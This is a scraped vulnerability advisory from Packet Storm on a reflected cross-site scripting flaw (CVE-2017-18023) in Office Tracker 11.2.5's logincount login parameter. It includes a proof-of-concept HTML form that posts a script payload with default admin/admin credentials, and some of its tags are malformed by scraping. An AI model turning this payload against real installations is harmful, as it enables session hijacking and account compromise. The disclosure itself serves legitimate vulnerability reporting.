Lucene search
Nassim AsrirPACKETSTORM:145775HistoryJan 09, 2018 - 12:00 a.m.
Office Tracker 11.2.5 Cross Site Scripting
2018-01-0900:00:00
Nassim Asrir
packetstormsecurity.com
18
EPSS
0.001
Percentile
39.3%
`# Title: Office Tracker 11.2.5 - XSS
# Author: Nassim Asrir
# Contact: [email protected]
# Vendor: https://www.officetracker.com/
# CVE: CVE-2017-18023
# Description
Office Tracker 11.2.5 has XSS via the
logincount parameter to the /otweb/OTPClientLogin URI.
------------------------------------------
# Details
The value of the logincount request parameter is copied into the HTML
document as plain text between tags. The payload
chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount
parameter. This input was echoed unmodified in the application's
response.
------------------------------------------
# Vulnerability Type
Cross Site Scripting (XSS)
------------------------------------------
# Attack Type
Remote
------------------------------------------
# POC
<html>
<body
<scripthistory.pushState('', '', '/')</script
<form action="http://server/otweb/OTPClientLogin" method="POST"
<input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" /
<input type="hidden" name="lastname" value="MorisonM" /
<input type="hidden" name="timezone" value="" /
<input type="hidden" name="uid" value="" /
<input type="hidden" name="phone" value="false" /
<input type="hidden" name="login" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="submitbtn" value="Login" /
<input type="submit" value="Submit request" /
</form
</body
</html
------------------------------------------
`
Related
cve
cve
CVE-2017-18023
2018-01-10 18:29:01
cvelist
cvelist
CVE-2017-18023
2018-01-10 18:00:00
nvd
nvd
CVE-2017-18023
2018-01-10 18:29:01
prion
prion
Code injection
2018-01-10 18:29:00